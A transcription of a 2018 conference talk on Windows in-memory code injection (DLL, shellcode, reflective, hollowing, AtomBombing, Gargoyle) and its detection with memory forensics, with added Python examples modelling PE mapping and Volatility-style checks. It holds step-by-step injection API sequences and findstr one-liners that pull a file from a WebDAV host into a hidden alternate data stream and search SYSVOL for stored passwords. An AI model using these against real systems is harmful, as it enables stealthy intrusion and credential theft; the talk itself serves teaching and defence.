Transcription

Hidden in plain sight?
Blackhoodie 2018

Hidden in plain sight
Essy - @casheeew
3rd time Blackhoodie attendee
I'm really just curious (: (it's addictive)
The infamous shoulder of giants: see credits at the end

rundll32 ...
- How do they work?
- What is this in-memory stuff?
- How do we detect it?
- Living off the land playground
- Conclusion
- Rabbitholes
It's been a long day. You've heard a lot of stuff. Let's try to keep it relaxed (:

msbuild.exe ...
Tools & Techniques
[diagram: attack lifecycle, ending in C2 and Actions]

InstallUtil.exe /U Tools.dll
- Bloodhound
- Metasploit Framework
- PowerShell Empire
- ...
see ...

Bloodhound
Developed: 2016
Author: Andrew Robbins, Rohan Vazarkar, Will Schroeder
Technology: Javascript, Electron, neo4j, PS/C# ingestor
Techniques: Visualize relationships
- Graph theory to reveal relationships in ADs
- Goal: Quickly identify complex attack paths
- Graph queries are built via Cypher over edges such as memberOf, hasSession, AdminTo, ACLs, CanRDP, ...
- Red & Blue team tool

Meterpreter (Metasploit Framework)
Developed: 2003
Author: H.D. Moore
Language: Ruby
Techniques: Public exploits, post exploitation modules, auxiliary modules, ...
- advanced multifunction payload
- multi platform
- encrypted communication
Process injection
- injects itself into a running process
- uses reflective DLL injection
- metsrv.dll's header can be modified to be usable as shellcode (the DOS header bytes are patched so that execution can start at offset 0 and jump into the reflective loader)

PowerShell Empire
Developed: 2015
Author: Will Schroeder, Matt Nelson, Justin ...
... exploitation without powershell.exe
Modules
- code execution
- collection
- credentials
- lateral movement
- management
- persistence
- privesc
- situational awareness
- trollsploit
Process injection
- launcher code for the agent is embedded in the .DLL
- after the initial payload, all subsequent attacks are stored in memory

But how does it work?

(In-)Memory stuff & Code injection
Techniques:
- Remote DLL injection
- Remote shellcode injection
- Reflective DLL injection
- Process hollowing
- APC injection
- AtomBombing
- Gargoyle (ROP/APCs)
- Injection via shims
- Inline hooking
- insert more rabbit holes here

Remote DLL injection
Our process -> Victim process
- OpenProcess() on the victim with PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE
- VirtualAllocEx() a PAGE_READWRITE buffer in the victim; it only has to hold the path of evil.dll, which is copied over with WriteProcessMemory()
- GetModuleHandle() / GetProcAddress() to find the address of LoadLibrary (kernel32 sits at the same address in every process of the same bitness until the next boot, so our address is valid in the victim too)
- CreateRemoteThread() with LoadLibrary as the start routine and the buffer as its argument; LoadLibrary ends up in LdrLoadDll (native)
- the victim loads evil.dll like any other module

Hidden in plain sight?

Remote DLL injection - Detection examples
- not easy to distinguish between a malicious DLL and DLLs explicitly loaded by the victim process ('LoadLibrary')
- the injected DLL hides in plain sight, just try
  - listdlls
  - Process Explorer
  - Process Hacker
- it blends in with legitimate modules: it is file-backed, has a proper loader entry and a path on disk
- chances of detection are higher if we try to hide the DLL, e.g.
  - unlink its entry from the LDR_DATA_TABLE_ENTRY lists (ldrmodules shows the mismatch between the VAD and the PEB lists)
  - unpack and copy decompressed code to a new memory region
- Typical API calls: ..., CreateRemoteThread -> LoadLibrary / LdrLoadDll (native)
- modern detections track & flag 'CreateRemoteThread', in particular a remote thread whose start address is LoadLibrary
not fancy enough, let's move on.

Remote shellcode injection
1. Our process allocates memory in the victim process using 'VirtualAllocEx' with the 'PAGE_EXECUTE_READWRITE' protection
2. Our process transfers a block of code to the victim process using 'WriteProcessMemory'
3. Our process calls 'CreateRemoteThread' and points the thread's starting address to a function within the transferred block of code inside the victim process
Typical API calls: ..., VirtualAllocEx, WriteProcessMemory, CreateRemoteThread

Hidden in plain sight?

Remote shellcode injection - Detection examples
Tools to investigate:
- Process Hacker
- Process Explorer (Sysinternals)
- listdlls (Sysinternals command-line utility)
- or use the Windows API functions (see CreateToolhelp32Snapshot)
Volatility plugin 'malfind'
- looks for readable, writable and executable private memory regions
- those regions will contain shellcode (or a PE header)
- malfind displays a hex dump and disassembly of the start of each region
- caveat: JIT runtimes (.NET, JavaScript engines) legitimately create private RWX memory, so each hit still needs a look at the bytes
Typical API calls: ..., VirtualAllocEx, WriteProcessMemory, CreateRemoteThread
still too easy. let's try harder

Reflective DLL injection
- the DLL is responsible for loading itself
- it implements a minimal PE file loader: in Stephen Fewer's method an exported loader function parses its own headers, allocates memory, maps the sections, applies relocations, resolves imports and calls DllMain
Our process: recv(evil.dll, buff); the raw file is then written into the victim process as-is, no LoadLibrary involved
Typical API calls: OpenProcess, VirtualAllocEx, WriteProcessMemory, ..., GetProcAddress(), CreateRemoteThread(...) with the file offset of the exported loader as the start address
see ...

"[...] Empire has the ability to inject an agent into another process using ReflectivePick to load up the .NET common language runtime into a process and execute a particular PowerShell command, all without starting a new powershell.exe process!"
see https://www.powershellempire.com/?page_id=273
"[...] a reflective DLL based on Stephen Fewer's method. It imports/runs a .NET assembly into its memory space that supports the running of Powershell code using System.Management.Automation. Due to its reflective property, it can be injected into any process using a reflective injector and allows the execution of Powershell code by any process"
see .../master/PowerPick
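What "implements a minimal PE file loader" means in practice, as an added example that is not the talk's code, Empire's, or Stephen Fewer's: a Python model of the mapping step a reflective loader performs once its raw file bytes sit in the victim, i.e. parse the headers, lay the sections out at their RVAs, and apply base relocations for the address the image actually landed at. The DLL it maps is constructed inline with struct (two sections, one DIR64 relocation; SAMPLE_BASE, the pointer slot at 0x1010 and its target at 0x1020 are this example's own layout). Import resolution and the DllMain call are left out; on Windows these same steps run inside the loader's own RWX allocation, which is the memory signal the detection slides key on.

```python
"""Model of the mapping step a reflective loader performs once its own raw
file bytes are inside the victim: parse the PE headers, lay the sections out
at their RVAs, apply base relocations for the address the image landed at.

Added example (not the talk's, Empire's or Stephen Fewer's code). Import
resolution and the DllMain call are left out; SAMPLE_BASE, the 0x1010 pointer
slot and the 0x1020 target are this example's own constructed layout."""
import struct

IMAGE_DOS_SIGNATURE = 0x5A4D             # 'MZ'
IMAGE_NT_SIGNATURE = 0x00004550          # 'PE\0\0'
IMAGE_NT_OPTIONAL_HDR64_MAGIC = 0x20B    # PE32+
IMAGE_DIRECTORY_ENTRY_BASERELOC = 5
IMAGE_REL_BASED_ABSOLUTE = 0             # padding entry, skip
IMAGE_REL_BASED_DIR64 = 10               # add delta to a 64-bit pointer

SAMPLE_BASE = 0x180000000   # preferred ImageBase of the constructed DLL
PTR_RVA = 0x1010            # the sample stores an absolute pointer here ...
TARGET_RVA = 0x1020         # ... pointing at this RVA, so it needs relocating


def build_sample_dll() -> bytes:
    """Constructed PE32+ DLL: DOS/NT headers, .text and .reloc. Not a real DLL."""
    text = bytearray(0x200)
    struct.pack_into('<Q', text, PTR_RVA - 0x1000, SAMPLE_BASE + TARGET_RVA)
    text[TARGET_RVA - 0x1000:TARGET_RVA - 0x1000 + 4] = b'\xc3\x90\x90\x90'  # ret; nop x3
    reloc = bytearray(0x200)  # one block for page 0x1000: a DIR64 entry plus an ABSOLUTE pad
    struct.pack_into('<IIHH', reloc, 0, 0x1000, 12,
                     (IMAGE_REL_BASED_DIR64 << 12) | (PTR_RVA - 0x1000), IMAGE_REL_BASED_ABSOLUTE)
    dos = bytearray(0x40)
    struct.pack_into('<H', dos, 0, IMAGE_DOS_SIGNATURE)
    struct.pack_into('<I', dos, 0x3C, 0x40)  # e_lfanew: NT headers right after the DOS header
    # Signature + IMAGE_FILE_HEADER: AMD64, 2 sections, 240-byte optional header, DLL flags
    nt = struct.pack('<IHHIIIHH', IMAGE_NT_SIGNATURE, 0x8664, 2, 0, 0, 0, 240, 0x2022)
    # IMAGE_OPTIONAL_HEADER64 up to NumberOfRvaAndSizes (112 bytes), then 16 data directories
    opt = struct.pack('<HBBIIIIIQIIHHHHHHIIIIHHQQQQII',
                      IMAGE_NT_OPTIONAL_HDR64_MAGIC, 14, 0, 0x200, 0x200, 0,
                      TARGET_RVA, 0x1000, SAMPLE_BASE, 0x1000, 0x200,
                      6, 0, 0, 0, 6, 0, 0, 0x3000, 0x200, 0, 2, 0x160,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = bytearray(16 * 8)
    struct.pack_into('<II', dirs, IMAGE_DIRECTORY_ENTRY_BASERELOC * 8, 0x2000, 12)
    sections = struct.pack('<8sIIIIIIHHI', b'.text', 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    sections += struct.pack('<8sIIIIIIHHI', b'.reloc', 0x200, 0x2000, 0x200, 0x400, 0, 0, 0, 0, 0x42000040)
    headers = (bytes(dos) + nt + opt + bytes(dirs) + sections).ljust(0x200, b'\0')
    return headers + bytes(text) + bytes(reloc)


def parse_pe(image: bytes) -> dict:
    """The handful of header fields the loader needs; rejects anything that is not PE32+."""
    if struct.unpack_from('<H', image, 0)[0] != IMAGE_DOS_SIGNATURE:
        raise ValueError('no MZ header')
    e_lfanew = struct.unpack_from('<I', image, 0x3C)[0]
    if struct.unpack_from('<I', image, e_lfanew)[0] != IMAGE_NT_SIGNATURE:
        raise ValueError('no PE signature')
    num_sections = struct.unpack_from('<H', image, e_lfanew + 6)[0]
    size_of_opt = struct.unpack_from('<H', image, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    if struct.unpack_from('<H', image, opt)[0] != IMAGE_NT_OPTIONAL_HDR64_MAGIC:
        raise ValueError('only PE32+ is handled here')
    image_base = struct.unpack_from('<Q', image, opt + 24)[0]
    size_of_image, size_of_headers = struct.unpack_from('<II', image, opt + 56)
    reloc_dir = struct.unpack_from('<II', image, opt + 112 + IMAGE_DIRECTORY_ENTRY_BASERELOC * 8)
    sections = []
    for i in range(num_sections):
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from('<8sIIII', image, opt + size_of_opt + i * 40)
        sections.append((name.rstrip(b'\0').decode(), va, vsize, raw_ptr, raw_size))
    return dict(image_base=image_base, size_of_image=size_of_image,
                size_of_headers=size_of_headers, reloc=reloc_dir, sections=sections)


def reflective_map(image: bytes, new_base: int) -> bytearray:
    """Lay the file image out as it would sit at new_base and fix up absolute pointers."""
    pe = parse_pe(image)
    mem = bytearray(pe['size_of_image'])          # stands in for the loader's VirtualAlloc
    mem[:pe['size_of_headers']] = image[:pe['size_of_headers']]
    for _, va, vsize, raw_ptr, raw_size in pe['sections']:
        n = min(raw_size, vsize) if vsize else raw_size
        mem[va:va + n] = image[raw_ptr:raw_ptr + n]
    delta = new_base - pe['image_base']           # zero if we landed at the preferred base
    pos, end = pe['reloc'][0], pe['reloc'][0] + pe['reloc'][1]
    while delta and pos < end:
        page_rva, block_size = struct.unpack_from('<II', mem, pos)
        for k in range((block_size - 8) // 2):
            entry = struct.unpack_from('<H', mem, pos + 8 + 2 * k)[0]
            kind, offset = entry >> 12, entry & 0xFFF
            if kind == IMAGE_REL_BASED_DIR64:
                where = page_rva + offset
                value = struct.unpack_from('<Q', mem, where)[0]
                struct.pack_into('<Q', mem, where, (value + delta) & 0xFFFFFFFFFFFFFFFF)
            elif kind != IMAGE_REL_BASED_ABSOLUTE:
                raise ValueError(f'unsupported relocation type {kind}')
        pos += block_size
    return mem


def relocated_pointer(mem: bytearray) -> int:
    """The sample's absolute pointer after mapping; equals new_base + TARGET_RVA once fixed up."""
    return struct.unpack_from('<Q', mem, PTR_RVA)[0]


if __name__ == '__main__':
    mapped = reflective_map(build_sample_dll(), 0x7FF6A0000000)
    print(hex(relocated_pointer(mapped)))
```

Mapping at the preferred base leaves the pointer untouched; mapping anywhere else walks the .reloc blocks exactly as the exported loader would, and because the whole image ends up in one private allocation that has to be executable, the result is the large RWX region that malfind and the ATP slide look for.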

Hidden in plain sight?

Reflective DLL injection - Detection examples
- Again, the primary signal: memory events
- several larger RWX sections mapped into the process; triage them with
  - allocation size
  - allocation history
  - thread information (which thread started in them, and from where)
  - allocation flags
- Volatility plugin 'malfind': look for RWX pages
- WinDbg: !address -F:PAGE_EXECUTE_READWRITE
- How Windows Defender ATP does it: see .../windows-defender-atp/
Well, well, well. Can we get fancier?

Process Hollowing*
A legitimate process is loaded to act as a container for hostile code
1. Create a process in suspended state (CREATE_SUSPENDED)
2. Call 'ZwUnmapViewOfSection' to unmap the original image from the new process
3. Allocate memory at the image base using 'VirtualAllocEx'
4. Write the hostile image to the process memory using 'WriteProcessMemory'
5. Get the thread context via 'GetThreadContext'
6. Modify it (point the start-address register at the new image's entry point) and set the desired context via 'SetThreadContext'
7. Call 'ResumeThread' to start the process
Typical API calls: CreateProcess, ZwUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, GetThreadContext, SetThreadContext, ResumeThread, VirtualProtectEx
[diagram: C:\Windows\system32\calc.exe, PID 1337, with PEB, ntdll.dll, kernel32.dll; the malware image replaces calc.exe in memory, no file association needed]
* see links at the end for a PoC

Hidden in plain sight?

Process Hollowing - Detection examples
Volatility
- dlllist
- ldrmodules
- malfind # shows suspicious memory protection
- hollowfind plugin # finds the discrepancy between the VAD and the PEB: the PEB still names the original image, but the VAD at that base no longer maps its file
Take a look at 'Investigating Hollow Process Injection Using Memory Forensics' (link at the end)
  python vol.py -f victim.vmem dlllist -p 1337
  python vol.py -f victim.vmem ldrmodules -p 1337
  python vol.py -f victim.vmem malfind -p 1337
  python vol.py -f victim.vmem hollowfind -p 1337 -D dump/
(Volatility 2 also wants --profile=<OS profile> for the image unless the default profile happens to match)
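The checks behind the three plugins on this slide, and behind malfind and ldrmodules on the earlier detection slides, written out over a constructed process snapshot so the logic can be read and run offline. This is an added example, not Volatility's code: the VAD, loader-list and PEB fields are hand-built dataclasses standing in for what the plugins carve out of a memory image, and the sample process (calc.exe, PID 1337, once clean and once with a hollowed image, a shellcode region and a reflectively loaded PE) is made up to exercise each check.

```python
"""Triage logic mirroring the Volatility plugins on this slide (malfind,
ldrmodules, hollowfind), run over a constructed process snapshot.

Added example, not Volatility code. A real plugin walks _EPROCESS, the VAD
tree and the PEB loader lists; here those are hand-built dataclasses so the
checks run offline. Addresses, sizes and file names are made up."""
from dataclasses import dataclass
from typing import List, Optional, Tuple

PAGE_READWRITE = 0x04
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80   # usual initial protection of an image mapping


@dataclass
class Vad:
    start: int
    size: int
    protection: int           # initial protection recorded in the VAD
    private: bool             # True: VirtualAlloc'ed; False: mapped section
    file_name: Optional[str]  # backing file of an image/mapped section, else None
    head: bytes               # first bytes of the region (constructed)


@dataclass
class LdrEntry:               # one _LDR_DATA_TABLE_ENTRY from PEB->Ldr
    base: int
    full_name: str


@dataclass
class ProcessSnapshot:
    pid: int
    image_path: str           # PEB->ProcessParameters->ImagePathName
    peb_image_base: int       # PEB->ImageBaseAddress
    vads: List[Vad]
    ldr: List[LdrEntry]


def malfind(snap: ProcessSnapshot) -> List[Tuple[int, str]]:
    """Private memory that is writable and executable: shellcode or a PE written there."""
    hits = []
    for v in snap.vads:
        if v.private and v.protection == PAGE_EXECUTE_READWRITE:
            what = 'PE header (MZ)' if v.head.startswith(b'MZ') else 'shellcode or unknown code'
            hits.append((v.start, what))
    return hits


def ldrmodules(snap: ProcessSnapshot) -> List[int]:
    """PE images present in memory that the loader lists in the PEB do not know about."""
    listed = {e.base for e in snap.ldr}
    return [v.start for v in snap.vads if v.head.startswith(b'MZ') and v.start not in listed]


def hollowfind(snap: ProcessSnapshot) -> Optional[str]:
    """Does the VAD at PEB->ImageBaseAddress still map the process's own image file?"""
    v = next((x for x in snap.vads if x.start == snap.peb_image_base), None)
    if v is None:
        return 'image base in PEB has no VAD (unmapped)'
    if v.private or v.file_name is None:
        return 'image base backed by private memory, not the image file'
    if v.file_name.lower() != snap.image_path.lower():
        return f'PEB names {snap.image_path} but VAD maps {v.file_name}'
    return None


def build_samples() -> Tuple[ProcessSnapshot, ProcessSnapshot]:
    """Constructed snapshots: a clean calc.exe and the same PID after hollowing + injection."""
    sysdir = r'C:\Windows\system32'
    ntdll = Vad(0x7FFE10000000, 0x1F0000, PAGE_EXECUTE_WRITECOPY, False, sysdir + r'\ntdll.dll', b'MZ\x90')
    calc = Vad(0x7FF600000000, 0x3000, PAGE_EXECUTE_WRITECOPY, False, sysdir + r'\calc.exe', b'MZ\x90')
    ldr = [LdrEntry(calc.start, calc.file_name), LdrEntry(ntdll.start, ntdll.file_name)]
    clean = ProcessSnapshot(1337, calc.file_name, calc.start, [calc, ntdll], ldr)

    # hollowed: calc.exe unmapped, hostile PE written at the same base via WriteProcessMemory;
    # the PEB and loader list still describe calc.exe, which is exactly what hollowfind checks
    hollowed_image = Vad(calc.start, 0x3000, PAGE_EXECUTE_READWRITE, True, None, b'MZ\x90')
    injected_code = Vad(0x20000000, 0x1000, PAGE_EXECUTE_READWRITE, True, None, b'\xfc\x48\x83\xe4')
    reflective = Vad(0x21000000, 0x40000, PAGE_EXECUTE_READWRITE, True, None, b'MZ\x90')
    evil = ProcessSnapshot(1337, calc.file_name, calc.start,
                           [hollowed_image, ntdll, injected_code, reflective], ldr)
    return clean, evil


if __name__ == '__main__':
    for label, snap in zip(('clean', 'evil'), build_samples()):
        print(label, malfind(snap), ldrmodules(snap), hollowfind(snap))
```

Note what each check does and does not see: the hollowed image still has its original loader entry, so ldrmodules says nothing about it and only hollowfind catches the mismatch; the reflectively loaded PE never had one, so ldrmodules and malfind both fire; and a JIT runtime would produce the same private RWX hits as the shellcode region, which is why the reflective-injection slide pairs protection with allocation size, history and thread start addresses.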

AtomBombing
Global Atom Table: shared between processes, written with GlobalAddAtom() and read back with GlobalGetAtomName()
Our process: GlobalAddAtom() stores a chunk of the malicious code and gets a 16-bit integer (the atom) back
Victim process: GlobalGetAtomName(), called via an APC, copies the malicious code into RW memory; a ROP chain, driven through the thread context, moves it into RWX memory
Typical API calls: GlobalAddAtom, GlobalGetAtomName, ..., NtSetContextThread

AtomBombing (continued)
- We avoid writing to the victim process with traditional means (no WriteProcessMemory)
- We put our shellcode in the global atom table via GlobalAddAtom()
- We queue an APC in the victim that calls GlobalGetAtomName() to fetch it
- We let it gradually build the shellcode in a code cave (RW memory the victim already has)
- We use an APC again to execute a ROP chain that copies it into RWX memory allocated via ZwAllocateVirtualMemory()
Typical API calls: GlobalAddAtom, GlobalGetAtomName, ZwAllocateVirtualMemory, NtQueueApcThread, NtSetContextThread

Evading memory scanners
This is not the DLL you're looking for
see 'The Art of Memory Forensics'

Evading memory scanners - Gargoyle
The implant keeps its own memory non-executable while it sleeps and periodically flips it back with VirtualProtect(Ex) via a timer-queued APC and a ROP chain, so a scanner looking for executable private pages only sees it during the short windows in which it actually runs
Typical API calls: ..., VirtualProtectEx
see .../analysis-evasion.html

...but let's move on

“Living off the land”

Living off the land
[Execute | AWL | ... | Credentials | Copy | Dump | Upload | Encode]
dir C:\Windows\system32\*.exe /s /b | findstr /v .exe > todo.txt
*** Alternate Data Streams
** sry not sry for the german only phun

Living off the land - findstr.exe
[Execute | AWL | ... | Credentials | Copy | Dump | Upload | Encode]
findstr /V /L TheCakeIsALie \\webdavsrv\folder\file.exe > c:\ADS\file.txt:file.exe
  (download: /V prints every line that does NOT contain the literal string, i.e. the whole remote file, and the redirect drops it into an alternate data stream of file.txt, where dir and most tooling will not show it)
findstr /S /I cpassword \\sysvol\policies\*.xml
  (credentials: Group Policy Preference XML files in SYSVOL carry passwords encrypted with a publicly documented AES key, MS14-025)
thx @Oddvarmoe
see https://adsecurity.org/?p=2288

Living off the land - rundll32.exe
[Execute | AWL | ... | Credentials | Copy | Dump | Upload | Encode]
thx @subtee

Living off the land - ...
https://lolbas-project.github.io/

return conclusion
- Hidden depends on your viewpoint
- Life gets harder for red teamers and attackers?
  - some techniques are pretty advanced
  - some detections are pretty good
  - the approach to blend in with normal (admin) usage becomes more and more appealing
- "Living off the land" techniques combined with advanced in-memory execution: new path of hope to avoid detections? Hype?
- Tools to visualise stuff on the blue side
- Red team tooling switches from PS to C#, but that's a topic for another rabbit hole (;

Expand-Archive -Path presentation.zip -DestinationPath C:\hereberabbitholes
[Code] - Bloodhound Repository
[Recording] - Extending BloodHound for Red Teamers - Tom Porter
[Blog] - Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin
[Blog] - Using Bloodhound to Map the Domain
[Recording] - Bloodhound: He Attac, but he also Protec - Andy Robbins, Rohan Vazarkar
[Blog] - Hidden Administrative Accounts: BloodHound to the Rescue
[Links] - Active Directory Attacks and Modern Post Exploitation Adversary Tradecraft
[Presentation] - Meterpreter internals
[Docs] - Meterpreter Stageless Mode
[Code] - Powershell Empire Repository
[Recording] - PowerShell Empire - Dave Hull
[Recording] - PowerShell Empire Strikes Back by Walter Legowski
[Recording] - Learn PowerShell Empire 2 From A to Z
[Code] - PowerPick Code Repository
[Recording] - Taking Hunting to the Next Level: Hunting in Memory - SANS Threat Hunting Summit 2017
[Blog] - Loading a DLL from memory
[Blog] - Hunting in Memory
[Blog] - PowerShell: In-Memory Injection Using CertUtil.exe
[Blog] - Memory injection like a boss
[Code] - ReflectiveDLL Injection Repository
[Blog] - Reflective DLL Injection with PowerShell
[Recording] - Reflective DLL Injection Metasploit Module
[Blog] - Metasploit Payload-Types
[Paper] - Remote library injection
[Whitepaper] - Who needs malware? How adversaries use fileless attacks to evade your security
[Blog] - MITRE ATT&CK Process Hollowing technique
[Recording] - Investigating Hollow Process Injection Using Memory Forensics
[Blog] - Reversing and investigating malware evasive tactics - Hollow process injection
[Code] - PoC Process Hollowing by FuzzySecurity (Start-Hollow.ps1)
[Blog] - Bypassing Memory Scanners with Cobalt Strike and Gargoyle
[Presentation] - Memory resident implants - code injection is alive and well by Luke Jennings
[Blog] - Gargoyle, a memory scanning evasion technique
[Code] - Gargoyle Code Repository
[Blog] - Hunting for Gargoyle
[Code] - The Memory Process File System
[Recording] - Living Off The Land: A Minimalist's Guide To Windows Post Exploitation - Chris Campbell, Matt Graeber
[Recording] - LOLBins: Nothing to LOL about - Oddvar Moe
[Blog] - LOLBAS project website
[Code] - LOLBAS code repository
[Book] - The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory
[Book] - The Hacker Playbook 3: Practical Guide To Penetration Testing
[Book] - What Makes It Page? The Windows 7 (x64) Virtual Memory Manager
[Whitepaper] - Living off the land and fileless attack techniques by Symantec
[Tools] - Awesome Windows Post-Exploitation tool list

Awesome people to follow for these and other exciting topics
[the list of Twitter handles did not survive transcription] ...and many, many more I guess.

wmic.exe /node:"audience" process call create "questions.exe"
